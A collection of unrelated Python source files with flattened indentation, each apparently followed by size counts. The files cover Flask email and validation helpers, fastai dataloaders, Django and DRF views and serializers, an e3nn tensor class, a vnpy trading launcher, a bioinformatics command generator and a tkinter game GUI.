from smtplib import SMTPDataError
from threading import Thread
from app import mail
import logging
logger = logging.getLogger(__name__)
def _async(app, msg):
with app.app_context():
try:
mail.send(msg)
except SMTPDataError as e:
logger.warning(str(e))
def send_email_async(app, recipient, subject, template, bcc=None, **kwargs):
if not isinstance(recipient, list):
recipient = [recipient]
msg = Message(
app.config['EMAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['EMAIL_SENDER'],
recipients=recipient, bcc=bcc)
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
Thread(target=_async, args=(app, msg)).start()
| 851 | 267 |
# AUTOGENERATED! DO NOT EDIT! File to edit: notebooks/02_dataloaders.ipynb (unless otherwise specified).
__all__ = ['ObjectDetectionDataLoaders']
# Cell
from fastai.vision.all import *
from .core import *
# Cell
def _bin_mask_stack_and_padding(t, pad_idx=0):
"Function for padding to create batches when number of objects is different"
stacked_masks = [torch.stack(t[i][1], dim=0) for i in range(len(t))]
imgs = [t[i][0] for i in range(len(t))]
bboxes = [t[i][2] for i in range(len(t))]
labels = [t[i][3] for i in range(len(t))]
samples = L(t for t in zip(imgs,stacked_masks,bboxes,labels))
samples = [(s[0], *_clip_remove_empty_with_mask(*s[1:])) for s in samples]
max_len = max([len(s[3]) for s in samples])
def _f(img,bin_mask,bbox,lbl):
bin_mask = torch.cat([bin_mask,bin_mask.new_zeros(max_len-bin_mask.shape[0], bin_mask.shape[-2], bin_mask.shape[-1])])
bbox = torch.cat([bbox,bbox.new_zeros(max_len-bbox.shape[0], 4)])
lbl = torch.cat([lbl,lbl.new_zeros(max_len-lbl.shape[0])+pad_idx])
return img,TensorBinMasks(bin_mask),bbox,lbl
return [_f(*s) for s in samples]
def _clip_remove_empty_with_mask(bin_mask, bbox, label):
bbox = torch.clamp(bbox, -1, 1)
empty = ((bbox[...,2] - bbox[...,0])*(bbox[...,3] - bbox[...,1]) <= 0.)
return (bin_mask[~empty], bbox[~empty], label[~empty])
# Cell
class ObjectDetectionDataLoaders(DataLoaders):
"""Basic wrapper around `DataLoader`s with factory method
for object dections and instance segmentation problems"""
df = pd.DataFrame()
img_id_col, img_path_col, class_col = "","",""
bbox_cols = []
mask_path_col,object_id_col = "",""
@classmethod
@delegates(DataLoaders.from_dblock)
def from_df(cls, df, valid_pct=0.2, img_id_col="image_id", img_path_col="image_path",
bbox_cols=["x_min", "y_min", "x_max", "y_max"], class_col="class_name",
mask_path_col="mask_path", object_id_col="object_id",
seed=None, vocab=None, add_na=True, item_tfms=None, batch_tfms=None, debug=False, **kwargs):
"""Create dataloaders from `DataFrame`"""
if vocab is None :
vocab = [c for c in df[class_col].unique()]
cls.df = df
cls.img_id_col,cls.img_path_col,cls.class_col = img_id_col,img_path_col,class_col
cls.bbox_cols = bbox_cols
cls.mask_path_col,cls.object_id_col = mask_path_col,object_id_col
with_mask = mask_path_col in df.columns
#if item_tfms is None: item_tfms = [Resize(800, method="pad", pad_mode="zeros")]
if not with_mask:
dblock = DataBlock(
blocks=(ImageBlock(cls=PILImage), BBoxBlock, BBoxLblBlock(vocab=vocab, add_na=add_na)),
n_inp=1,
splitter=RandomSplitter(valid_pct),
get_items=cls._get_images,
get_y=[cls._get_bboxes, cls._get_labels],
item_tfms=item_tfms,
batch_tfms=batch_tfms)
if debug: print(dblock.summary(df))
res = cls.from_dblock(dblock, df, path=".", before_batch=[bb_pad], **kwargs)
else:
if batch_tfms is None: batch_tfms = []
dblock = DataBlock(
blocks=(ImageBlock(cls=PILImage), BinaryMasksBlock,
BBoxBlock, BBoxLblBlock(vocab=vocab, add_na=add_na)),
n_inp=1,
splitter=RandomSplitter(valid_pct),
get_items=cls._get_images,
get_y=[cls._get_masks, cls._get_bboxes, cls._get_labels],
item_tfms=item_tfms,
batch_tfms=[TensorBinMasks2TensorMask(), *batch_tfms])
if debug: print(dblock.summary(df))
res = cls.from_dblock(dblock, df, path=".", before_batch=[_bin_mask_stack_and_padding],**kwargs)
return res
def _get_images(df):
img_path_col = ObjectDetectionDataLoaders.img_path_col
fns = L(fn for fn in df[img_path_col].unique())
return fns
def _get_bboxes(fn):
df = ObjectDetectionDataLoaders.df
img_path_col = ObjectDetectionDataLoaders.img_path_col
x_min_col, y_min_col, x_max_col, y_max_col = ObjectDetectionDataLoaders.bbox_cols
filt = df[img_path_col] == fn #Path(fn)
bboxes = [list(i) for i in zip(df.loc[filt,x_min_col], df.loc[filt,y_min_col],
df.loc[filt,x_max_col], df.loc[filt,y_max_col])]
return bboxes
def _get_labels(fn):
df = ObjectDetectionDataLoaders.df
img_path_col = ObjectDetectionDataLoaders.img_path_col
class_col = ObjectDetectionDataLoaders.class_col
filt = df[img_path_col] == fn #Path(fn)
labels = [l for l in df.loc[filt, class_col]]
return labels
def _get_masks(fn):
df = ObjectDetectionDataLoaders.df
img_path_col = ObjectDetectionDataLoaders.img_path_col
mask_path_col = ObjectDetectionDataLoaders.mask_path_col
filt = df[img_path_col] == fn
mask_paths = [m for m in df.loc[filt, mask_path_col]]
return mask_paths | 5,151 | 1,888 |
'''
Description:
Get information from Youtube in a simple way.
Author: AlejandroV
Version: 0.1.0
'''
import AVMYT as yt
channel = yt.getChannelInfo("luisito") # get channel
print(channel["name"] + " tiene " + channel["subs"] + " y un total de " + channel["videos"]) # prints info of Luisito Comunica | 317 | 104 |
import multiprocessing
import os
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG, EVENT_ERROR
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import okexGateway
from vnpy.trader.app import ctaStrategy
from vnpy.trader.app.ctaStrategy.ctaBase import EVENT_CTA_LOG
def findConnectKey():
files=os.listdir(".")
for file in files:
if file.find("_connect.json")>=0:
return file.replace("_connect.json","")
#----------------------------------------------------------------------
def runChildProcess():
"""子进程运行函数"""
print('-'*30)
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
# le.addConsoleHandler()
# le.addFileHandler()
le.info(u'启动CTA策略运行子进程')
ee = EventEngine2()
le.info(u'事件引擎创建成功')
me = MainEngine(ee)
me.addGateway(okexGateway)
me.addApp(ctaStrategy)
le.info(u'主引擎创建成功')
ee.register(EVENT_LOG, le.processLogEvent)
ee.register(EVENT_CTA_LOG, le.processLogEvent)
le.info(u'注册日志事件监听')
KEY = findConnectKey()
me.connect(KEY)
le.info(u'连接行情和交易接口')
sleep(5) # 等待接口初始化
me.dataEngine.saveContracts() # 保存合约信息到文件
cta = me.getApp(ctaStrategy.appName)
cta.loadSetting()
cta.initAll()
cta.startAll()
while True:
sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
"""父进程运行函数"""
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.addFileHandler()
le.info(u'启动CTA策略守护父进程')
DAY_START = time(8, 45) # 日盘启动和停止时间
DAY_END = time(15, 30)
NIGHT_START = time(20, 45) # 夜盘启动和停止时间
NIGHT_END = time(2, 45)
p = None # 子进程句柄
while True:
currentTime = datetime.now().time()
recording = False
# 判断当前处于的时间段
if ((currentTime >= DAY_START and currentTime <= DAY_END) or
(currentTime >= NIGHT_START) or
(currentTime <= NIGHT_END)):
recording = True
# 记录时间则需要启动子进程
if recording and p is None:
le.info(u'启动子进程')
p = multiprocessing.Process(target=runChildProcess)
p.start()
le.info(u'子进程启动成功')
# 非记录时间则退出子进程
if not recording and p is not None:
le.info(u'关闭子进程')
p.terminate()
p.join()
p = None
le.info(u'子进程关闭成功')
sleep(5)
if __name__ == '__main__':
runChildProcess() # 7*24 全时段无人值守
# 尽管同样实现了无人值守,但强烈建议每天启动时人工检查,为自己的PNL负责
#runParentProcess() | 2,821 | 1,191 |
import logging
import sys
LOG_LEVEL_MAP = {
'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL,
}
class ExporterError(Exception):
pass
class ExporterLogger(logging.Logger):
def __init__(self, name, path=None, level='error', fmt='%(asctime)s [%(levelname)-5.5s]: %(message)s'):
self._path = path
self._level = self.level(level)
super(ExporterLogger, self).__init__(name, self._level)
self._formatter = logging.Formatter(fmt)
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setFormatter(self._formatter)
self.addHandler(stream_handler)
@classmethod
def level(cls, level):
return LOG_LEVEL_MAP[level.lower()]
@property
def formatter(self):
return self._formatter
| 881 | 285 |
# IMPORT
import os,sys
# MAIN
print('''
inp1 = file with list of SRA files
inp2 = bowtie index base (full path)
inp3 = SE (0) or PE (1) or paired processed as single (2)
inp3 and on:
Any additional parameters for ProcessSRA_hpcc2.py
These will be appended exactly as they appear
''')
files = sys.argv[1]
bowtie_index = sys.argv[2]
SE = sys.argv[3]
out_cmd = "module load SRAToolkit; module load FastQC; module load Trimmomatic; \
module load TopHat2; module load Boost; module load SAMtools; module load python; \
python /mnt/home/john3784/Github/RNAseq_pipeline/\
ProcessSRA_hpcc2.py %s %s %s"
if len(sys.argv) > 4:
additional_commands = " ".join(sys.argv[4:])
out_cmd = out_cmd+" "+additional_commands
file_list = [f.strip() for f in open(files,"r").readlines()]
output = open(files+".runcc","w")
for file in file_list:
output.write(out_cmd %(file, bowtie_index, SE)+"\n")
# out_commands = ["module load SRAToolkit; module load Trimmomatic; \
# module load TopHat2; module load Boost; python /mnt/home/lloydjo1/\
# Projects/7_intergenic_transcription_poaceae/_scripts/ProcessSRA_hpcc.py\ " + \
# f + " -genome " + bowtie_index + "\n" for f in file_list]
output.close()
| 1,181 | 458 |
from django.contrib.auth.models import User, Group
from rest_framework import serializers
from rest_framework.serializers import StringRelatedField
from drf_haystack.serializers import HaystackSerializer
from . models import Media, MediaPublish, Category, Creator, Provider, MediaUser
from . search_indexes import MediaIndex
class MediaSerializer(serializers.HyperlinkedModelSerializer):
genre = serializers.StringRelatedField(many=True, read_only=True)
publisher = serializers.StringRelatedField(many=True, read_only=True)
artist = serializers.StringRelatedField(many=True, read_only=True)
class Meta:
model = Media
fields = [
'url',
'id',
'title',
'artist',
'publisher',
'originating_country',
'genre',
'publishing_date',
'date_published']
class CategorySerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Category
fields = ['id', 'name', 'description']
class CreatorSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Creator
fields = ['id', 'name', 'date_of_birth']
class ProviderSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Provider
fields = ['id', 'name', 'provider_rank']
class MediaUserSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = MediaUser
fields = ['id', 'name']
class MediaPublishSerializer(serializers.HyperlinkedModelSerializer):
user = serializers.StringRelatedField(read_only=True)
media = serializers.StringRelatedField(read_only=True)
class Meta:
model = MediaPublish
fields = ['id', 'user', 'media', 'date_expiry']
class MediaSearchSerializer(HaystackSerializer):
class Meta:
index_classes = [MediaIndex]
fields = ['text', 'country_published', 'date']
class UserSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = User
fields = ('username', 'email', "first_name", "last_name")
class GroupSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Group
fields = ("name", )
| 2,097 | 668 |
from typing import List, Optional, Type
from beam.registry import default_registry, register
from django.apps import apps
from django.contrib import messages
from django.contrib.admin.utils import NestedObjects
from django.core.exceptions import FieldDoesNotExist, PermissionDenied
from django.db import router
from django.forms import all_valid
from django.http import HttpResponse, HttpResponseForbidden
from django.shortcuts import redirect
from django.utils.html import escape
from django.utils.translation import gettext as _
from django.views import generic
from django.views.generic.base import ContextMixin, TemplateView
from django_filters.filterset import filterset_factory
from extra_views import SearchableListMixin
from .actions import Action
from .components import Component, ListComponent
from .inlines import RelatedInline
class ComponentMixin(ContextMixin):
component: Optional[Component] = None
viewset = None
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["viewset"] = self.viewset
context["component"] = self.component
context["popup"] = self.request.GET.get("_popup")
return context
@property
def model(self):
return self.component.model
def get_queryset(self):
return self.component.queryset
def get_form_class(self):
if self.component.form_class:
return self.component.form_class
return super().get_form_class()
@property
def fields(self):
if self.component.fields:
return self.component.fields
return super().fields
def get_inline_classes(self):
return self.component.inline_classes
def has_perm(self):
try:
obj = self.get_object()
except AttributeError:
obj = None
return self.component.has_perm(self.request.user, obj)
def handle_no_permission(self):
if self.request.user.is_authenticated:
raise PermissionDenied("You shall not pass")
# Inner import to prevent django.contrib.admin (app) from
# importing django.contrib.auth.models.User (unrelated model).
from django.contrib.auth.views import redirect_to_login
return redirect_to_login(self.request.get_full_path())
def dispatch(self, request, *args, **kwargs):
if not self.has_perm():
return self.handle_no_permission()
return super().dispatch(request, *args, **kwargs)
class InlinesMixin(ContextMixin):
inline_classes: List[Type[RelatedInline]] = []
def get_inline_classes(self):
return self.inline_classes
def get_inlines(self, object=None):
inlines = []
for inline_class in self.get_inline_classes():
inlines.append(
inline_class(
parent_instance=object if object is not None else self.object,
parent_model=self.model,
request=self.request,
)
)
return inlines
def get_context_data(self, **kwargs):
if "inlines" not in kwargs:
kwargs["inlines"] = self.get_inlines()
return super().get_context_data(**kwargs)
class CreateWithInlinesMixin(InlinesMixin):
def post(self, request, *args, **kwargs):
self.object = None
form_class = self.get_form_class()
form = self.get_form(form_class)
if form.is_valid():
# we have to make sure that the same instance is used for form and inlines
inlines = self.get_inlines(object=form.save(commit=False))
else:
inlines = self.get_inlines()
if all_valid(inline.formset for inline in inlines) and form.is_valid():
return self.form_valid(form, inlines)
return self.form_invalid(form, inlines)
def form_valid(self, form, inlines):
self.object = form.save()
for inline in inlines:
inline.formset.save()
return redirect(self.get_success_url())
def form_invalid(self, form, inlines):
return self.render_to_response(
self.get_context_data(form=form, inlines=inlines)
)
class UpdateWithInlinesMixin(InlinesMixin):
def post(self, request, *args, **kwargs):
self.object = self.get_object()
form_class = self.get_form_class()
form = self.get_form(form_class)
inlines = self.get_inlines()
if form.is_valid() and all_valid(inline.formset for inline in inlines):
return self.form_valid(form, inlines)
return self.form_invalid(form, inlines)
def form_valid(self, form, inlines):
self.object = form.save()
for inline in inlines:
inline.formset.save()
return redirect(self.get_success_url())
def form_invalid(self, form, inlines):
return self.render_to_response(
self.get_context_data(form=form, inlines=inlines)
)
class CreateView(ComponentMixin, CreateWithInlinesMixin, generic.CreateView):
def get_template_names(self):
return super().get_template_names() + ["beam/create.html"]
def get_success_url(self):
return self.viewset.links["detail"].reverse(
obj=self.object, request=self.request
)
def get_success_message(self):
return _('The {model} "{name}" was added successfully.').format(
model=self.model._meta.verbose_name,
name=str(self.object),
)
def form_valid(self, form, inlines):
response = super().form_valid(form, inlines)
success_message = self.get_success_message()
if success_message:
messages.success(self.request, success_message)
if self.request.GET.get("_popup"):
return self.popup_response()
return response
def popup_response(self):
return HttpResponse(
"<script>"
"window.opener.postMessage("
'{{id: "{id}", result: "created", source: "{source}", text: "{text}"}}, '
"document.origin"
");"
"window.close()"
"</script>".format(
id=escape(self.object.pk),
source=escape(self.request.GET["_popup"]),
text=escape(str(self.object)),
)
)
class UpdateView(ComponentMixin, UpdateWithInlinesMixin, generic.UpdateView):
def get_template_names(self):
return super().get_template_names() + ["beam/update.html"]
def get_success_message(self):
return _('The {model} "{name}" was changed successfully.').format(
model=self.model._meta.verbose_name,
name=str(self.object),
)
def form_valid(self, form, inlines):
response = super().form_valid(form, inlines)
success_message = self.get_success_message()
if success_message:
messages.success(self.request, success_message)
return response
def get_success_url(self):
if self.request.POST.get("submit", None) == "save_and_continue_editing":
return self.request.get_full_path()
return self.viewset.links["detail"].reverse(
obj=self.object, request=self.request
)
class SortableListMixin(ComponentMixin):
sort_param = "o"
sort_separator = ","
def get_sort_fields(self):
if self.component.list_sort_fields is None:
return [
# cast to string to support virtual fields
str(field)
for field in self.component.fields
if self.get_sort_column_for_field(str(field))
]
for field in self.component.list_sort_fields:
if self.get_sort_column_for_field(field) is None:
raise Exception(
"Unable to determine sort column for explicit sort field {} on {}".format(
field, self.viewset
)
)
return self.component.list_sort_fields
def get_sort_fields_columns(self):
return self.component.list_sort_fields_columns or {}
def get_sort_column_for_field(self, field_name):
explicit = self.get_sort_fields_columns()
if field_name in explicit:
return explicit[field_name]
try:
field = self.model._meta.get_field(field_name)
return field.name
except FieldDoesNotExist:
return None
def get_sort_fields_from_request(self) -> List[str]:
fields = []
sort_fields = set(self.get_sort_fields())
for field in self.request.GET.get(self.sort_param, "").split(
self.sort_separator
):
if field.startswith("-"):
sort_field = field[1:]
else:
sort_field = field
if sort_field in sort_fields:
fields.append(field)
return fields
def get_sort_columns(self, fields):
columns = []
for field in fields:
if field.startswith("-"):
descending = True
field = field[1:]
else:
descending = False
column = self.get_sort_column_for_field(field)
if not column:
continue
columns.append("-" + column if descending else column)
return columns
def sort_queryset(self, qs):
current_sort_fields = self.get_sort_fields_from_request()
current_sort_columns = self.get_sort_columns(current_sort_fields)
if current_sort_columns:
qs = qs.order_by(*current_sort_columns)
return qs
def get_queryset(self):
qs = super().get_queryset()
return self.sort_queryset(qs)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["sortable_fields"] = set(self.get_sort_fields())
context["sorted_fields"] = self.get_sort_fields_from_request()
return context
class FiltersetMixin(ComponentMixin):
filterset_class = None
filterset_fields = None
filterset = None
def get_filterset_fields(self):
if self.filterset_fields is not None:
return self.filterset_fields
return self.component.list_filterset_fields
def get_filterset_class(self):
if self.filterset_class:
return self.filterset_class
if self.component.list_filterset_class:
return self.component.list_filterset_class
elif self.component.list_filterset_fields:
return filterset_factory(
model=self.model, fields=self.get_filterset_fields()
)
return None
def get_filterset_kwargs(self):
"""
Returns the keyword arguments for instantiating the filterset.
"""
kwargs = {
"data": self.request.GET or None,
"request": self.request,
"prefix": "filter",
"queryset": self.component.queryset,
}
return kwargs
def get_filterset(self):
filterset_class = self.get_filterset_class()
if not filterset_class:
return None
return filterset_class(**self.get_filterset_kwargs())
def get_queryset(self):
qs = super().get_queryset()
if self.filterset and self.filterset.is_bound and self.filterset.is_valid():
qs = self.filterset.filter_queryset(qs)
return qs
def dispatch(self, request, *args, **kwargs):
self.filterset = self.get_filterset()
return super().dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["filterset"] = self.filterset
return context
class InlineActionMixin(InlinesMixin):
def get_action_qs(self, inline):
ids = self.request.POST.getlist("_action_select[]")
select_across = self.request.POST.get("_action_select_across") == "all"
objects = inline.get_queryset()
if not select_across:
objects = objects.filter(pk__in=ids)
if not select_across and len(objects) != len(ids):
messages.error(
self.request,
_(
"There was an error finding the objects you selected. "
"This could be caused by another user changing them concurrently. "
"Please try again."
),
)
return objects.none()
return objects
def get_action(self):
for inline in self.get_inlines(self.get_object()):
action = inline.get_action()
if action and action.is_bound:
return inline, action
return None, None
def handle_action(self, inline, action):
form = action.get_form()
if form and not form.is_valid():
return None
result: Optional[HttpResponse] = action.apply(
queryset=self.get_action_qs(inline)
)
success_message: str = action.get_success_message()
if success_message:
messages.success(self.request, success_message)
if result:
return result
return redirect(self.request.get_full_path())
def post(self, request, *args, **kwargs):
inline, action = self.get_action()
if action:
response = self.handle_action(inline, action)
if response:
return response
return self.get(request, *args, **kwargs)
class ListActionsMixin(ComponentMixin):
component: ListComponent
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["actions"] = self.actions
return context
def get_action_qs(self):
ids = self.request.POST.getlist("_action_select[]")
select_across = self.request.POST.get("_action_select_across") == "all"
objects = self.get_queryset()
if not select_across:
objects = objects.filter(pk__in=ids)
if not select_across and len(objects) != len(ids):
messages.error(
self.request,
_(
"There was an error finding the objects you selected. "
"This could be caused by another user changing them concurrently. "
"Please try again."
),
)
return objects.none()
return objects
def get_actions(self):
selected_action = self.request.POST.get("_action_choice")
actions = []
action_class: Type[Action]
for index, action_class in enumerate(self.component.list_actions_classes):
action_id = "{}-{}".format(index, action_class.name)
action = action_class(
data=self.request.POST if action_id == selected_action else None,
model=self.model,
id=action_id,
request=self.request,
)
if action.has_perm(self.request.user):
actions.append(action)
return actions
def get_action(self):
for action in self.actions:
if action.is_bound:
return action
return None
def handle_action(self, action):
form = action.get_form()
if form and not form.is_valid():
return None
result: Optional[HttpResponse] = action.apply(queryset=self.get_action_qs())
success_message: str = action.get_success_message()
if success_message:
messages.success(self.request, success_message)
if result:
return result
return redirect(self.request.get_full_path())
def dispatch(self, request, *args, **kwargs):
self.actions = self.get_actions()
return super().dispatch(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
action = self.get_action()
if action:
response = self.handle_action(action)
if response:
return response
return self.get(request, *args, **kwargs)
class ListView(
ListActionsMixin,
FiltersetMixin,
SearchableListMixin,
SortableListMixin,
ComponentMixin,
generic.ListView,
):
@property
def search_fields(self):
return self.component.list_search_fields
def get_paginate_by(self, queryset):
return self.component.list_paginate_by
def get_search_query(self):
if not self.search_fields:
return ""
return super().get_search_query()
def get_template_names(self):
return super().get_template_names() + ["beam/list.html"]
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["search_query"] = self.get_search_query()
context["list_item_link_layout"] = self.component.list_item_link_layout
return context
class DetailView(InlineActionMixin, ComponentMixin, InlinesMixin, generic.DetailView):
def get_template_names(self):
return super().get_template_names() + ["beam/detail.html"]
class DeleteView(ComponentMixin, InlinesMixin, generic.DeleteView):
def get_template_names(self):
return super().get_template_names() + ["beam/delete.html"]
def get_success_url(self):
return self.viewset.links["list"].reverse(request=self.request)
def get_success_message(self):
return _('The {model} "{name}" was deleted successfully.').format(
model=self.model._meta.verbose_name, name=str(self.object)
)
def post(self, request, *args, **kwargs):
self.object = self.get_object()
nested, protected = self.get_nested_objects(self.object)
if protected:
return HttpResponseForbidden()
success_message = self.get_success_message()
response = self.delete(request, *args, **kwargs)
if success_message:
messages.success(request, success_message)
return response
@classmethod
def get_nested_objects(cls, obj):
using = router.db_for_write(cls.model)
collector = NestedObjects(using=using)
collector.collect([obj])
nested = collector.nested(cls._format_obj)
return nested, list(map(cls._format_obj, collector.protected))
@staticmethod
def _format_obj(obj):
return '%s "%s"' % (obj._meta.verbose_name, str(obj))
def get_context_data(self, **kwargs):
context = super(DeleteView, self).get_context_data(**kwargs)
nested, protected = self.get_nested_objects(self.get_object())
context.update(
{
"object": self.object,
"object_name": self._format_obj(self.object),
"nested_objects": nested,
"protected_objects": protected,
}
)
return context
class DashboardView(TemplateView):
template_name = "beam/dashboard.html"
viewsets = None
registry = default_registry
def build_registry(self, viewsets):
registry = {}
for viewset in viewsets:
register(registry, viewset)
return registry
def get_registry(self):
if self.viewsets:
return self.build_registry(self.viewsets)
else:
return self.registry
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
grouped = []
for app_label, viewsets_dict in self.get_registry().items():
group = {
"app_label": app_label,
"app_config": apps.get_app_config(app_label),
"viewsets": viewsets_dict.values(),
}
grouped.append(group)
context["grouped_by_app"] = grouped
return context
| 19,976 | 5,592 |
# pylint: disable=not-callable, no-member, invalid-name, line-too-long, missing-docstring, arguments-differ
import numpy as np
import torch
from e3nn import rs
from e3nn.kernel_mod import FrozenKernel
from e3nn.tensor.spherical_tensor import projection
class FourierTensor:
def __init__(self, signal, mul, lmax, p_val=0, p_arg=0):
"""
f: s2 x r -> R^N
Rotations
[D(g) f](x) = f(g^{-1} x)
Parity
[P f](x) = p_val f(p_arg x)
f(x) = sum F^l . Y^l(x)
This class contains the F^l
Rotations
[D(g) f](x) = sum [D^l(g) F^l] . Y^l(x) (using equiv. of Y and orthogonality of D)
Parity
[P f](x) = sum [p_val p_arg^l F^l] . Y^l(x) (using parity of Y)
"""
if signal.shape[-1] != mul * (lmax + 1)**2:
raise ValueError(
"Last tensor dimension and Rs do not have same dimension.")
self.signal = signal
self.lmax = lmax
self.mul = mul
self.Rs = rs.convention([(mul, l, p_val * p_arg**l)
for l in range(lmax + 1)])
self.radial_model = None
@classmethod
def from_geometry(cls, vectors, radial_model, lmax, sum_points=True):
"""
:param vectors: tensor of shape [..., xyz]
:param radial_model: function of signature R+ -> R^mul
:param lmax: maximal order of the signal
"""
size = vectors.shape[:-1]
vectors = vectors.reshape(-1, 3) # [N, 3]
radii = vectors.norm(2, -1)
radial_functions = radial_model(radii)
*_size, R = radial_functions.shape
Rs = [(R, L) for L in range(lmax + 1)]
mul_map = rs.map_mul_to_Rs(Rs)
radial_functions = torch.einsum('nr,dr->nd',
radial_functions.repeat(1, lmax + 1),
mul_map) # [N, signal]
Ys = projection(vectors / radii.unsqueeze(-1), lmax) # [N, l * m]
irrep_map = rs.map_irrep_to_Rs(Rs)
Ys = torch.einsum('nc,dc->nd', Ys, irrep_map) # [N, l * mul * m]
signal = Ys * radial_functions # [N, l * mul * m]
if sum_points:
signal = signal.sum(0)
else:
signal = signal.reshape(*size, -1)
new_cls = cls(signal, R, lmax)
new_cls.radial_model = radial_model
return new_cls
def plot(self, box_length, center=None, n=30,
radial_model=None, relu=True):
muls, _ls, _ps = zip(*self.Rs)
# We assume radial functions are repeated across L's
assert len(set(muls)) == 1
num_L = len(self.Rs)
if radial_model is None:
radial_model = self.radial_model
def new_radial(x):
return radial_model(x).repeat(1, num_L) # Repeat along filter dim
r, f = plot_on_grid(box_length, new_radial, self.Rs, n=n)
# Multiply coefficients
f = torch.einsum('xd,d->x', f, self.signal)
f = f.relu() if relu else f
if center is not None:
r += center.unsqueeze(0)
return r, f
def change_lmax(self, lmax):
new_Rs = [(self.mul, l) for l in range(lmax + 1)]
if self.lmax == lmax:
return self
elif self.lmax > lmax:
new_signal = self.signal[:rs.dim(new_Rs)]
return FourierTensor(new_signal, self.mul, lmax)
elif self.lmax < lmax:
new_signal = torch.zeros(rs.dim(new_Rs))
new_signal[:rs.dim(self.Rs)] = self.signal
return FourierTensor(new_signal, self.mul, lmax)
def __add__(self, other):
if self.mul != other.mul:
raise ValueError("Multiplicities do not match.")
lmax = max(self.lmax, other.lmax)
new_self = self.change_lmax(lmax)
new_other = other.change_lmax(lmax)
return FourierTensor(new_self.signal + new_other.signal, self.mul, self.lmax)
def plot_on_grid(box_length, radial_model, Rs, n=30):
l_to_index = {}
set_of_l = set([l for mul, l, p in Rs])
start = 0
for l in set_of_l:
l_to_index[l] = [start, start + 2 * l + 1]
start += 2 * l + 1
r = np.mgrid[-1:1:n * 1j, -1:1:n * 1j, -1:1:n * 1j].reshape(3, -1)
r = r.transpose(1, 0)
r *= box_length / 2.
r = torch.from_numpy(r)
Rs_in = [(1, 0)]
Rs_out = Rs
def radial_lambda(_ignored):
return radial_model
grid = FrozenKernel(Rs_in, Rs_out, radial_lambda, r)
f = grid()
f = f[..., 0]
return r, f
| 4,557 | 1,681 |
import re
from flask import make_response, jsonify
"""
Validates key-value pairs of request dictionary body.
"""
def validate_users_key_pair_values(request):
keys = ['firstName','lastName','userName','email','phoneNumber','password']
errors = []
for key in keys:
if key not in request.json:
errors.append(key)
return errors
"""
Validates key-value pairs of request dictionary body.
"""
def validate_videos_key_pair_values(request):
keys = ['title','description','video_content']
errors = []
for key in keys:
if key not in request.json:
errors.append(key)
return errors
def check_for_blanks(data):
blanks = []
for key, value in data.items():
if value == "":
blanks.append(key)
return blanks
def check_for_non_strings(data):
non_strings = []
for key, value in data.items():
if key != 'id' and not isinstance(value, str):
non_strings.append(key)
return non_strings
def check_for_non_ints(data):
non_ints = []
for key, value in data.items():
if not isinstance(value, int):
non_ints.append(key)
return non_ints | 1,189 | 359 |
from tkinter import *
from agents.baseAgent import baseAgent
class guiPlayerAgent(baseAgent):
'''Extends baseAgent to provide a GUI for the player to use to play.'''
def __init__(self,*args,**kwargs):
super().__init__(*args,**kwargs)
#Window initialization
self.window = Tk()
self.window.resizable(0,0)
self.window.title("5 Line Game V2.2 - guiPlayerAgent")
self.frame=Frame(self.window)
Grid.rowconfigure(self.window, 0, weight=1)
Grid.columnconfigure(self.window, 0, weight=1)
self.frame.grid(row=0, column=0, sticky=N+S+E+W)
Grid.rowconfigure(self.frame, 0, weight=1)
Grid.columnconfigure(self.frame, 0, weight=1)
#actual extensions
self.input = None
self.btns = []
maxSize = 600
unit = maxSize/3
xSize = self.state.length()*unit
ySize = self.state.height()*unit
while(xSize > maxSize or ySize > maxSize):
unit -= 1
xSize = self.state.length()*unit
ySize = self.state.height()*unit
self.window.geometry("%dx%d"%(xSize,ySize))
return
#helper functions
#enables all buttons
def enable(self):
'''Enables all grid buttons.'''
for y in range(self.state.height()):
for x in range(self.state.length()):
self.btns[y][x].configure(state=NORMAL)
return
#disables all buttons
def disable(self):
'''Disables all grid buttons.'''
for y in range(self.state.height()):
for x in range(self.state.length()):
self.btns[y][x].configure(state=DISABLED)
return
#changes/setups button texts
def btnupdate(self):
'''Updates grid buttons to represent current self.state.'''
if self.btns == []:
self.btninit()
grid = self.state.grid()
for y in range(self.state.height()):
for x in range(self.state.length()):
self.btns[y][x].configure(text=grid[y][x])
return
#handler for buttons
def passInput(self,coord):
'''Click handler for grid buttons.'''
self.input = coord
return
#setup buttons in grid and gives them above handler
def btninit(self):
'''Creates grid of buttons.'''
for y in range(self.state.height()):
row = []
for x in range(self.state.length()):
btn = Button(self.frame,text=" ",height=1,width=1,command=lambda coord=(x,y): self.passInput(coord))
btn.grid(column=x, row=y, sticky=N+S+E+W)
btn.configure(state=DISABLED)
row.append(btn)
self.btns.append(row)
for x in range(self.state.length()):
Grid.columnconfigure(self.frame, x, weight=1)
for y in range(self.state.height()):
Grid.rowconfigure(self.frame, y, weight=1)
return
#extendables
#setter
def update(self,state,curPiece):
super().update(state,curPiece)
self.btnupdate()
self.window.update()
return
#getter
def getMove(self,state):
super().getMove(state)
self.input = None
self.enable()
while(self.input == None):
self.window.update()
